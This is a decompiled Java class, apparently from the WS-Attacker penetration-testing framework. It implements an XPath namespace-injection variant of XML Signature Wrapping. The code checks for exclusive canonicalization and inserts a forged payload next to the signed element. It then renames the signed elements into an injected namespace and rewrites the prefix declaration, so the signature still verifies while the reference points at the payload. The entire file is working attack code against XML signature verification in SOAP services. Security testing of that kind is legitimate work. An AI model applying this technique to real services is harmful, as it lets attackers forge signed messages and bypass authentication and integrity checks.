/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.signatureWrapping.xpath.weakness;

import java.util.List;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import wsattacker.library.signatureWrapping.option.PayloadElement;
import wsattacker.library.signatureWrapping.option.SignedElement;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.util.signature.XPathElement;
import wsattacker.library.signatureWrapping.xpath.interfaces.XPathWeaknessInterface;
import wsattacker.library.signatureWrapping.xpath.parts.Step;
import wsattacker.library.signatureWrapping.xpath.weakness.util.WeaknessLog;
import wsattacker.library.signatureWrapping.xpath.weakness.util.XPathWeaknessTools;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class XPathNamespaceInjectionWeakness
implements XPathWeaknessInterface {
    int numberOfSubtrees;
    int numberOfPossibleNamspacedeclarationPositions;
    Step step;
    XPathElement ref;

    public XPathNamespaceInjectionWeakness(XPathElement ref, Step step, SignedElement signedElement, PayloadElement payloadElement) throws InvalidWeaknessException {
        this.step = step;
        this.ref = ref;
        if (step.getPreviousStep() == null) {
            throw new InvalidWeaknessException("Namespace injection does not work on first step");
        }
        if (step.getNextStep() == null) {
            throw new InvalidWeaknessException("Namespace injection does not work on last step");
        }
        String prefix = step.getAxisSpecifier().getNodeName().getPrefix();
        if (prefix.isEmpty()) {
            throw new InvalidWeaknessException("No Prefix in this Step");
        }
        if (prefix.equals(signedElement.getSignedElement().getPrefix())) {
            throw new InvalidWeaknessException("Namespace injection technique requires the signed Element to have a different namespace than the injected one.");
        }
        boolean exclusive = false;
        Node node = ref.getXPathElement();
        while (node.getNodeType() == 1) {
            if (node.getLocalName().equals("SignedInfo") && node.getNamespaceURI().equals("http://www.w3.org/2000/09/xmldsig#")) {
                List canonList = DomUtilities.findChildren((Node)node, (String)"CanonicalizationMethod", (String)"http://www.w3.org/2000/09/xmldsig#");
                for (Element canon : canonList) {
                    if (!"http://www.w3.org/2001/10/xml-exc-c14n#".equals(canon.getAttribute("Algorithm")) && !"http://www.w3.org/2001/10/xml-exc-c14n#WithComments".equals(canon.getAttribute("Algorithm"))) continue;
                    exclusive = true;
                    break;
                }
            }
            node = node.getParentNode();
        }
        if (!exclusive) {
            throw new InvalidWeaknessException("No exclusve c14n used!");
        }
        this.numberOfSubtrees = XPathWeaknessTools.getSignedPostPart(step, signedElement.getSignedElement()).size();
        this.numberOfPossibleNamspacedeclarationPositions = 0;
        node = ref.getXPathElement();
        while (node.getNodeType() == 1) {
            ++this.numberOfPossibleNamspacedeclarationPositions;
            node = node.getParentNode();
        }
        if (this.getNumberOfPossibilities() == 0) {
            throw new InvalidWeaknessException("XPath does not match any Elements.");
        }
    }

    @Override
    public int getNumberOfPossibilities() {
        return 2 * this.numberOfSubtrees * this.numberOfPossibleNamspacedeclarationPositions;
    }

    @Override
    public void abuseWeakness(int index, SignedElement signedElement, PayloadElement payloadElement) throws InvalidWeaknessException {
        boolean before = index % 2 == 0;
        int elementIndex = (index /= 2) % this.numberOfSubtrees;
        int declarationPosition = (index /= this.numberOfSubtrees) % this.numberOfPossibleNamspacedeclarationPositions;
        this.abuseWeakness(before, elementIndex, declarationPosition, signedElement.getSignedElement(), payloadElement.getPayloadElement());
    }

    private void abuseWeakness(boolean before, int elementIndex, int declarationPosition, Element signedElement, Element payloadElement) throws InvalidWeaknessException {
        List<Element> matches = XPathWeaknessTools.getSignedPostPart(this.step, signedElement);
        Element signedPostPart = matches.get(elementIndex);
        Element payloadPostPart = XPathWeaknessTools.createPayloadPostPart(signedPostPart, signedElement, payloadElement);
        if (before) {
            WeaknessLog.append("Inserted Payload just before " + signedPostPart.getNodeName());
            signedPostPart.getParentNode().insertBefore(payloadPostPart, signedPostPart);
        } else {
            WeaknessLog.append("Inserted Payload after " + signedPostPart.getNodeName());
            signedPostPart.getParentNode().appendChild(payloadPostPart);
        }
        String theNamespaceUri = signedPostPart.getNamespaceURI();
        String thePrefix = signedPostPart.getPrefix();
        String injectedPrefix = "atk" + thePrefix;
        String injectedNamespaceUri = "http://sourceforge.net/projects/ws-attacker/";
        List taskList = DomUtilities.findChildren((Node)signedPostPart, null, (String)theNamespaceUri);
        taskList.add(0, signedPostPart);
        for (Element task : taskList) {
            if (!task.getPrefix().equals(thePrefix) || !task.getNamespaceURI().equals(theNamespaceUri)) continue;
            task.getOwnerDocument().renameNode(task, injectedNamespaceUri, injectedPrefix + ":" + task.getLocalName());
            WeaknessLog.append(String.format("Renamed %s:%s to {%s}%s", thePrefix, task.getLocalName(), task.getNamespaceURI(), task.getNodeName()));
        }
        Element declarationElement = DomUtilities.findCorrespondingElement((Document)signedElement.getOwnerDocument(), (Element)this.ref.getXPathElement());
        for (int i = 1; i < declarationPosition; ++i) {
            declarationElement = (Element)declarationElement.getParentNode();
        }
        declarationElement.setAttribute("xmlns:" + thePrefix, injectedNamespaceUri);
        WeaknessLog.append(String.format("Changed namespace declaration in <%s> to %s -> %s", declarationElement.getNodeName(), thePrefix, injectedNamespaceUri));
    }
}

